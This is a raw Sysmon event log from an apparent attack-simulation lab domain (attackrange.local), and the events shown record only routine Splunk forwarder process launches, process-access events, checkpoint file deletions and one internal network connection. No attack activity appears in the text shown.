07:58:03.881{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104873Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.881{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104872Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.881{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104871Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.881{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B40B-615A-0302-00000000FC01}1452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104870Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.881{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B40B-615A-0302-00000000FC01}1452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104869Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.882{58E9C193-B40B-615A-0302-00000000FC01}1452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104868Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.397{58E9C193-B40B-615A-0202-00000000FC01}27683396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104867Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.240{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8300001FCF5D8A3452C55D323CE2EB75,SHA256=2A5E6ED0BA5C6CB010B21F34ED9294690246E4DBD48ACE0944427B1ED349BFB8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104866Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.209{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B40B-615A-0202-00000000FC01}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104865Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104864Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104863Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104862Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104861Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.209{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B40B-615A-0202-00000000FC01}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104860Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.209{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B40B-615A-0202-00000000FC01}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104859Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.210{58E9C193-B40B-615A-0202-00000000FC01}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104858Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.148{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=845725AE3759E0DD2A50E95ACC5D39A2,SHA256=8F24168C0656DA127BB2402F9483CEE64E80EE026363844800576EB228ED2C30,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082749Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:00.779{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50115-false10.0.1.12-8000- 23542300x800000000000000082751Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:04.834{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74BD3CCD4E3C4917CE53C5ED7D297C38,SHA256=14549FED4378AC284E88032686A39C7495FDD9996E75FEFEEE404320E75F6B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104879Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:04.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71CBF146CD029C1603C74CBC77C10E9C,SHA256=D9B618A0D638E414D471ACEF7310843CFBD4D9B17A6A58213CC02C95CBAAB66A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104878Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:04.178{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77CC663527E54B4D714D99BC69B03ADD,SHA256=BCB47DD74DF5B62111DEC65E0005A85174086060C264EDF5F4A41C1DE24B1AD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104877Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:04.037{58E9C193-B40B-615A-0302-00000000FC01}14521812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082752Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:05.959{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D5C8AD1CE816E3B3FD216041A603C64,SHA256=F1247C69583A376B8E72CDB0E2D76AEACF3469CDBAF78DD3E742B0B23734B58A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104888Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.225{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B40D-615A-0402-00000000FC01}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104887Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104886Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104885Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104884Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104883Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.225{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B40D-615A-0402-00000000FC01}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104882Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.225{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B40D-615A-0402-00000000FC01}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104881Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.226{58E9C193-B40D-615A-0402-00000000FC01}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104880Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:05.178{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8522D1EA9E140BBE95AC57B18481D65C,SHA256=55CE712F615B4D4A3E04A7DA4D5388A3B5398CBD242DC836D95BD160DEDC6C9C,IMPHASH=00000000000000000000000000000000falsetrue 